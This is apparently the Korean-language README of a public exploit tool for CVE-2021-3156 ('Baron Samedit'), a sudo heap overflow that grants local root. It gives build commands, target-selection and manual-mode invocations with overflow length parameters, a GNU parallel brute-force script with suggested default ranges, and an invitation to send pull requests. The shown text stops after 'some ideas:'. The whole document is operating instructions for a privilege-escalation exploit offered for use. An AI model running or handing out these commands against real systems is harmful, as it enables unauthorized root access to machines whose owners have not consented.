
이것은 Qualys가 Baron Samedit이라고 명명한 CVE-2021-3156 sudo 취약점에 대한 익스플로잇입니다.
빌드:
$ make
타깃 목록:
$ ./sudo-hax-me-a-sandwich
실행:
$ ./sudo-hax-me-a-sandwich <target_number>
수동 모드:
$ ./sudo-hax-me-a-sandwich <smash_len_a> <smash_len_b> <null_stomp_len> <lc_all_len>
GNU parallel이 설치되어 있는지 확인하세요.
$ make brute
$ ./brute.sh <smash_start> <smash_end> <null_start> <null_end> <lc_start> <lc_end>
시도해 볼 기본값 몇 가지:
$ ./brute.sh 90 120 50 70 150 300
사용 가능한 모든 코어를 다 사용합니다. 넷플릭스 보면서 브루트포스를 돌리지 마세요.
(타당한) PR을 보내 주세요. 머지할 수도 있습니다.
몇 가지 아이디어: